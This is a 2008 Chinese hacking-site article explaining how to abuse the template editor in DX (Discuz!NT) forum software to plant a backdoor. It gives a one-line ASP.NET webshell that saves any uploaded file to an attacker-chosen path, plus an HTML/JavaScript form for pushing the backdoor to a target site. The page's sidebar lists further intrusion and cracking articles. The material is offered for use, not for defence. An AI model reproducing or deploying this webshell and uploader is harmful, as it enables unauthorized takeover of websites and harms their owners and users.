文章 | 入侵攻击 | 安全防御 | 电脑知识 | 建站技术 | 网络编程 | 网络知识 | 工具使用 | 新闻资讯 | 安全公告

下载 | 漏洞扫描 | 加密破解 | 入侵攻击 | 后门木马 | 溢出程序 | 综合工具 | 安全防护 | 原创作品 | 动画教程

论坛 | 黑客军火 | 配服务器 | 黑客情感 | 免费资源 | 被黑网站 | 美女贴图 | 会员照片 | 在线服务 | 网站首页

  当前位置:主页 > 技术文摘 > 入侵攻击 > 文章内容   您对新版的建议

.net一句话马以及dx论坛拿shell

www.hx99.org 阅读: 时间:2008-03-06 整理:华西黑盟
------------------------------------------------------------------
 

来源:loveshell

dx论坛后台提供编辑模板功能,对于.net分层设计的思想这是个很好的功能,可是这个功能也导致了安全漏洞,可以插入自己的后门(也可以直接目录跳转编辑其他的aspx文件)
<% if(Request.Files.Count > 0) Request.Files[0].SaveAs(Server.MapPath(Request.Form["pass"]));%>

<form enctype="multipart/form-data" action="http://1.com/index.aspx" name="hack" method="POST" onsubmit=doit()>
插的在这里<input name="url" type=text value="http://www.loveshell.net/blog/"/>
<br>
<br>
<input type="hidden" name="MAX_FILE_SIZE" value="30000" />
上传这只后门: <input name="userfile" type="file" />
<br>

<br>
<input name="pass" type=text value="loveshell.aspx"/>
<br>
<input type="submit" value="劳资要传" />
</form>

<script>
function doit(){
document.hack.action=document.hack.url.value;
document.hack.submit();
}
</script>

直接插在aspx页面就可以传马了 呵呵

http://msdn2.microsoft.com/zh-cn/library/

http://chs.gotdotnet.com/quickstart/aspplus/

学习.net的2个好地方

   ---------------------------------------------------------------------------------------------------
  上一篇:利用Debug Api 获得QQ2007密码
  下一篇:DJ?瞧我是怎样入侵你
   ---------------------------------------------------------------------------------------------------
用户名:
Email:
评论内容:
 
  精品推荐
密码失而复得 RAR文件密码
破解WEP无线网络密码详细
一次局域网入侵全过程-完
黑客如何破坏杀毒软件
入侵董燕妮个人网站全过程
破解密码相关心理学知识
经典入侵检测术语全接触
Ms08-067 Exp 详细测试流
Cookies的注入方法和原理
另类破解双系统Vista密码
资深黑客浅谈文件捆绑技术
渗透韩国服务器
免杀技术详解
新的挂马方式ARP欺骗挂马
入侵超变态动网论坛
社会工程学的全方位讲解与
PcShare 免杀 附加数据
SQL注射修改难猜解的MD5
利用WEBSHELL直接进入后台
上网特权我来定
使用CSS进行的攻击
利用MS08-058攻击Google
跨站跨出WEBSHELL
多思路WEB入侵
检测周杰伦官方网站
关于我们 | 发展历程 | 在线投稿 | 核心监督 | 友情链接 | 网站地图 | 网站留言 | 联系我们
Copyright © 2004-2009 Www.Hx99.Net
版本:华西黑盟网站系统V6.0 Email:root#hx99.org
中国·西安·宝鸡 请使用IE6.0版本, 分辩率1024×768进行浏览
版权所有 任意抄袭 注意完整
陕ICP备06000444号